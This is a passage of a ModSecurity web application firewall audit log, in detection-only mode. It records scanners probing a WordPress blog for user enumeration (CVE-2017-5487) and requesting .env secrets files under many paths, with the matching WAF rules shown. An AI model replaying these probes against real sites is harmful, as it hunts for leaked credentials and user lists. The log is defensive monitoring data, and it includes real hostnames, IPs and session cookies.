sr=130, sw=102, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --60af7f5e-Z-- --02be9756-A-- [15/Jun/2025:15:31:07.129009 +0530] aE6Z4g5W92IrFj5-L2B5YgAAAA0 172.68.242.7 45698 127.0.0.1 7081 --02be9756-B-- GET /blog//wp-json/wp/v2/users/ HTTP/1.0 Host: www.getcalley.com X-Real-IP: 172.68.242.7 X-Forwarded-For: 188.166.184.95 Connection: close cf-ray: 95013969680081fb-SIN cf-connecting-ip: 188.166.184.95 referer: https://www.eurordis.org/wp-login.php accept-encoding: gzip, br x-forwarded-proto: https accept-language: en,en-us;q=0.7,en;q=0.3 accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 cf-visitor: {"scheme":"https"} user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 cdn-loop: cloudflare; loops=1 cf-ipcountry: SG cookie: AWSALB=deleted; AWSALBCORS=deleted; PHPSESSID=e38ca71a8a825dca28d4683613555ef9; QNNKLHLW=deleted; wordpress_test_cookie=WP%20Cookie%20check; uiso=deleted; uip=deleted; arc-country=deleted; AKA_A2=deleted; keep_alive=deleted; cart_currency=deleted; _shopify_y=deleted; _shopify_s=deleted; _tracking_consent=deleted; _orig_referrer=deleted; _landing_page=deleted; ASPSESSIONIDCCQAQSTT=deleted; DIY_SB=deleted; tk_ai=deleted; visid_incap_2873182=deleted; incap_ses_4557_2873182=deleted; __cf_bm=deleted; TMog=deleted; globalTI_SID=deleted; Mint=deleted; pc=deleted; OJSSID=c9dcfaa94d2cb53c6f036a73669d0145; HttpOnly=HttpOnly --02be9756-F-- HTTP/1.1 301 Moved Permanently X-Powered-By: PHP/8.2.28 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://cdn.gtranslate.net/>; rel=dns-prefetch X-Redirect-By: WordPress Location: https://www.getcalley.com/blog/wp-json/wp/v2/users/ Vary: Accept-Encoding Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 --02be9756-H-- Message: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.getcalley.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.getcalley.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] [hostname "www.getcalley.com"] [uri "/blog/wp-json/wp/v2/users/"] [unique_id "aE6Z4g5W92IrFj5-L2B5YgAAAA0"] Apache-Handler: proxy:unix:/var/www/vhosts/system/getcalley.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749981666893771 235367 (- - -) Stopwatch2: 1749981666893771 235367; combined=7803, p1=439, p2=7236, p3=0, p4=0, p5=128, sr=95, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --02be9756-Z-- --681cc35c-A-- [15/Jun/2025:15:42:12.229479 +0530] aE6ce315LOn2YRwTZIgCcQAAAAc 83.217.210.41 52534 127.0.0.1 7081 --681cc35c-B-- GET //.env.production HTTP/1.0 Host: arch.cstechns.com X-Real-IP: 83.217.210.41 X-Accel-Internal: /internal-nginx-static-location Connection: close user-agent: Mozilla/5.0 (compatible; LeakScanner/1.0) accept-encoding: gzip --681cc35c-F-- HTTP/1.1 301 Moved Permanently X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-Redirect-By: WordPress Location: https://arch.cstechns.com/.env.production Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 --681cc35c-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "arch.cstechns.com"] [uri "/.env.production"] [unique_id "aE6ce315LOn2YRwTZIgCcQAAAAc"] Apache-Handler: proxy:unix:/var/www/vhosts/system/arch.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749982331501893 727651 (- - -) Stopwatch2: 1749982331501893 727651; combined=2126, p1=477, p2=1563, p3=0, p4=0, p5=85, sr=115, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --681cc35c-Z-- --4d0ee140-A-- [15/Jun/2025:15:42:14.199492 +0530] aE6cfB_rKu9vEuWYHiZZRAAAAAk 83.217.210.41 52566 127.0.0.1 7081 --4d0ee140-B-- GET /.env.production HTTP/1.0 Host: arch.cstechns.com X-Real-IP: 83.217.210.41 X-Accel-Internal: /internal-nginx-static-location Connection: close user-agent: Mozilla/5.0 (compatible; LeakScanner/1.0) referer: https://arch.cstechns.com//.env.production accept-encoding: gzip --4d0ee140-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://arch.cstechns.com/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 --4d0ee140-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "arch.cstechns.com"] [uri "/.env.production"] [unique_id "aE6cfB_rKu9vEuWYHiZZRAAAAAk"] Apache-Handler: proxy:unix:/var/www/vhosts/system/arch.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749982332797284 1402271 (- - -) Stopwatch2: 1749982332797284 1402271; combined=2494, p1=522, p2=1879, p3=0, p4=0, p5=93, sr=145, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --4d0ee140-Z-- --eee7b831-A-- [15/Jun/2025:15:42:14.706218 +0530] aE6cflirsA1ruSKrNWSMAAAAAAQ 83.217.210.41 52614 127.0.0.1 7081 --eee7b831-B-- GET //api/.env HTTP/1.0 Host: arch.cstechns.com X-Real-IP: 83.217.210.41 X-Accel-Internal: /internal-nginx-static-location Connection: close user-agent: Mozilla/5.0 (compatible; LeakScanner/1.0) accept-encoding: gzip --eee7b831-F-- HTTP/1.1 301 Moved Permanently X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-Redirect-By: WordPress Location: https://arch.cstechns.com/api/.env Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 --eee7b831-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "arch.cstechns.com"] [uri "/api/.env"] [unique_id "aE6cflirsA1ruSKrNWSMAAAAAAQ"] Apache-Handler: proxy:unix:/var/www/vhosts/system/arch.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749982334078005 628301 (- - -) Stopwatch2: 1749982334078005 628301; combined=2005, p1=363, p2=1549, p3=0, p4=0, p5=92, sr=90, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --eee7b831-Z-- --fc5c9d09-A-- [15/Jun/2025:15:42:16.564287 +0530] aE6cfzr2XEdSo0rTaLVmeQAAAAg 83.217.210.41 52652 127.0.0.1 7081 --fc5c9d09-B-- GET /api/.env HTTP/1.0 Host: arch.cstechns.com X-Real-IP: 83.217.210.41 X-Accel-Internal: /internal-nginx-static-location Connection: close user-agent: Mozilla/5.0 (compatible; LeakScanner/1.0) referer: https://arch.cstechns.com//api/.env accept-encoding: gzip --fc5c9d09-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://arch.cstechns.com/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 --fc5c9d09-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "arch.cstechns.com"] [uri "/api/.env"] [unique_id "aE6cfzr2XEdSo0rTaLVmeQAAAAg"] Apache-Handler: proxy:unix:/var/www/vhosts/system/arch.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749982335295789 1268560 (- - -) Stopwatch2: 1749982335295789 1268560; combined=2040, p1=404, p2=1532, p3=0, p4=0, p5=104, sr=98, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --fc5c9d09-Z-- --e0a6110d-A-- [15/Jun/2025:15:42:17.067068 +0530] aE6cgH15LOn2YRwTZIgCcwAAAAc 83.217.210.41 52708 127.0.0.1 7081 --e0a6110d-B-- GET //config/.env HTTP/1.0 Host: arch.cstechns.com X-Real-IP: 83.217.210.41 X-Accel-Internal: /internal-nginx-static-location Connection: close user-agent: Mozilla/5.0 (compatible; LeakScanner/1.0) accept-encoding: gzip --e0a6110d-F-- HTTP/1.1 301 Moved Permanently X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-Redirect-By: WordPress Location: https://arch.cstechns.com/config/.env Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 --e0a6110d-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "arch.cstechns.com"] [uri "/config/.env"] [unique_id "aE6cgH15LOn2YRwTZIgCcwAAAAc"] Apache-Handler: proxy:unix:/var/www/vhosts/system/arch.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749982336453476 613675 (- - -) Stopwatch2: 1749982336453476 613675; combined=1688, p1=338, p2=1226, p3=0, p4=0, p5=123, sr=86, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --e0a6110d-Z-- --287ce854-A-- [15/Jun/2025:15:42:23.317088 +0530] aE6chjQchg8T7fp9tjNt1QAAAAI 83.217.210.41 53558 127.0.0.1 7081 --287ce854-B-- GET //admin/.env HTTP/1.0 Host: arch.cstechns.com X-Real-IP: 83.217.210.41 X-Accel-Internal: /internal-nginx-static-location Connection: close user-agent: Mozilla/5.0 (compatible; LeakScanner/1.0) accept-encoding: gzip --287ce854-F-- HTTP/1.1 301 Moved Permanently X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-Redirect-By: WordPress Location: https://arch.cstechns.com/admin/.env Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 --287ce854-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "arch.cstechns.com"] [uri "/admin/.env"] [unique_id "aE6chjQchg8T7fp9tjNt1QAAAAI"] Apache-Handler: proxy:unix:/var/www/vhosts/system/arch.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749982342700221 616945 (- - -) Stopwatch2: 1749982342700221 616945; combined=1932, p1=551, p2=1282, p3=0, p4=0, p5=98, sr=94, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --287ce854-Z-- --09e2cc03-A-- [15/Jun/2025:15:42:25.035664 +0530] aE6ch5QyF2YG6Lw5tzGWeQAAAAo 83.217.210.41 53702 127.0.0.1 7081 --09e2cc03-B-- GET /admin/.env HTTP/1.0 Host: arch.cstechns.com X-Real-IP: 83.217.210.41 X-Accel-Internal: /internal-nginx-static-location Connection: close referer: https://arch.cstechns.com//admin/.env user-agent: Mozilla/5.0 (compatible; LeakScanner/1.0) accept-encoding: gzip --09e2cc03-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://arch.cstechns.com/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 --09e2cc03-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "arch.cstechns.com"] [uri "/admin/.env"] [unique_id "aE6ch5QyF2YG6Lw5tzGWeQAAAAo"] Apache-Handler: proxy:unix:/var/www/vhosts/system/arch.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749982343791857 1243867 (- - -) Stopwatch2: 1749982343791857 1243867; combined=1553, p1=364, p2=1094, p3=0, p4=0, p5=95, sr=91, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --09e2cc03-Z-- --57da7f0d-A-- [15/Jun/2025:15:42:25.470704 +0530] aE6ciH15LOn2YRwTZIgCeQAAAAc 83.217.210.41 53732 127.0.0.1 7081 --57da7f0d-B-- GET //backend/.env HTTP/1.0 Host: arch.cstechns.com X-Real-IP: 83.217.210.41 X-Accel-Internal: /internal-nginx-static-location Connection: close user-agent: Mozilla/5.0 (compatible; LeakScanner/1.0) accept-encoding: gzip --57da7f0d-F-- HTTP/1.1 301 Moved Permanently X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-Redirect-By: WordPress Location: https://arch.cstechns.com/backend/.env Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 --57da7f0d-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "arch.cstechns.com"] [uri "/backend/.env"] [unique_id "aE6ciH15LOn2YRwTZIgCeQAAAAc"] Apache-Handler: proxy:unix:/var/www/vhosts/system/arch.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749982344867664 603118 (- - -) Stopwatch2: 1749982344867664 603118; combined=2281, p1=456, p2=1700, p3=0, p4=0, p5=125, sr=109, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --57da7f0d-Z-- --44d1de04-A-- [15/Jun/2025:15:42:27.273355 +0530] aE6cisZRGs9Zs5Qd_koV6gAAAAA 83.217.210.41 53784 127.0.0.1 7081 --44d1de04-B-- GET /backend/.env HTTP/1.0 Host: arch.cstechns.com X-Real-IP: 83.217.210.41 X-Accel-Internal: /internal-nginx-static-location Connection: close user-agent: Mozilla/5.0 (compatible; LeakScanner/1.0) referer: https://arch.cstechns.com//backend/.env accept-encoding: gzip --44d1de04-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://arch.cstechns.com/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 --44d1de04-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "arch.cstechns.com"] [uri "/backend/.env"] [unique_id "aE6cisZRGs9Zs5Qd_koV6gAAAAA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/arch.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749982346039753 1233664 (- - -) Stopwatch2: 1749982346039753 1233664; combined=1764, p1=410, p2=1248, p3=0, p4=0, p5=106, sr=88, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --44d1de04-Z-- --2df49547-A-- [15/Jun/2025:15:42:28.052562 +0530] aE6cizQchg8T7fp9tjNt1wAAAAI 83.217.210.41 53830 127.0.0.1 7081 --2df49547-B-- GET //core/.env HTTP/1.0 Host: arch.cstechns.com X-Real-IP: 83.217.210.41 X-Accel-Internal: /internal-nginx-static-location Connection: close user-agent: Mozilla/5.0 (compatible; LeakScanner/1.0) accept-encoding: gzip --2df49547-F-- HTTP/1.1 301 Moved Permanently X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-Redirect-By: WordPress Location: https://arch.cstechns.com/core/.env Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 --2df49547-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "arch.cstechns.com"] [uri "/core/.env"] [unique_id "aE6cizQchg8T7fp9tjNt1wAAAAI"] Apache-Handler: proxy:unix:/var/www/vhosts/system/arch.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749982347406320 646317 (- - -) Stopwatch2: 1749982347406320 646317; combined=2065, p1=465, p2=1502, p3=0, p4=0, p5=97, sr=120, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --2df49547-Z-- --9ddd1847-A-- [15/Jun/2025:15:42:29.851020 +0530] aE6cjB_rKu9vEuWYHiZZTAAAAAk 83.217.210.41 53874 127.0.0.1 7081 --9ddd1847-B-- GET /core/.env HTTP/1.0 Host: arch.cstechns.com X-Real-IP: 83.217.210.41 X-Accel-Internal: /internal-nginx-static-location Connection: close user-agent: Mozilla/5.0 (compatible; LeakScanner/1.0) referer: https://arch.cstechns.com//core/.env accept-encoding: gzip --9ddd1847-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://arch.cstechns.com/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 --9ddd1847-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "arch.cstechns.com"] [uri "/core/.env"] [unique_id "aE6cjB_rKu9vEuWYHiZZTAAAAAk"] Apache-Handler: proxy:unix:/var/www/vhosts/system/arch.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749982348624075 1227010 (- - -) Stopwatch2: 1749982348624075 1227010; combined=1847, p1=416, p2=1338, p3=0, p4=0, p5=93, sr=125, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --9ddd1847-Z-- --a5719d6d-A-- [15/Jun/2025:15:42:30.540590 +0530] aE6cjcZRGs9Zs5Qd_koV6wAAAAA 83.217.210.41 36412 127.0.0.1 7081 --a5719d6d-B-- GET //v1/.env HTTP/1.0 Host: arch.cstechns.com X-Real-IP: 83.217.210.41 X-Accel-Internal: /internal-nginx-static-location Connection: close user-agent: Mozilla/5.0 (compatible; LeakScanner/1.0) accept-encoding: gzip --a5719d6d-F-- HTTP/1.1 301 Moved Permanently X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-Redirect-By: WordPress Location: https://arch.cstechns.com/v1/.env Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 --a5719d6d-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "arch.cstechns.com"] [uri "/v1/.env"] [unique_id "aE6cjcZRGs9Zs5Qd_koV6wAAAAA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/arch.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749982349940285 600385 (- - -) Stopwatch2: 1749982349940285 600385; combined=1671, p1=378, p2=1150, p3=0, p4=0, p5=143, sr=102, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --a5719d6d-Z-- --cf1d3c39-A-- [15/Jun/2025:15:42:32.605011 +0530] aE6cj-vhFIArpJWr_ioNnwAAAAU 83.217.210.41 36446 127.0.0.1 7081 --cf1d3c39-B-- GET /v1/.env HTTP/1.0 Host: arch.cstechns.com X-Real-IP: 83.217.210.41 X-Accel-Internal: /internal-nginx-static-location Connection: close user-agent: Mozilla/5.0 (compatible; LeakScanner/1.0) referer: https://arch.cstechns.com//v1/.env accept-encoding: gzip --cf1d3c39-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://arch.cstechns.com/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 --cf1d3c39-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "arch.cstechns.com"] [uri "/v1/.env"] [unique_id "aE6cj-vhFIArpJWr_ioNnwAAAAU"] Apache-Handler: proxy:unix:/var/www/vhosts/system/arch.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749982351336657 1268414 (- - -) Stopwatch2: 1749982351336657 1268414; combined=1312, p1=278, p2=918, p3=0, p4=0, p5=115, sr=72, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --cf1d3c39-Z-- --952b067c-A-- [15/Jun/2025:15:42:33.189303 +0530] aE6ckA9BijgXpeeI_r-2XAAAAAE 83.217.210.41 36486 127.0.0.1 7081 --952b067c-B-- GET //private/.env HTTP/1.0 Host: arch.cstechns.com X-Real-IP: 83.217.210.41 X-Accel-Internal: /internal-nginx-static-location Connection: close user-agent: Mozilla/5.0 (compatible; LeakScanner/1.0) accept-encoding: gzip --952b067c-F-- HTTP/1.1 301 Moved Permanently X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-Redirect-By: WordPress Location: https://arch.cstechns.com/private/.env Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 --952b067c-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] 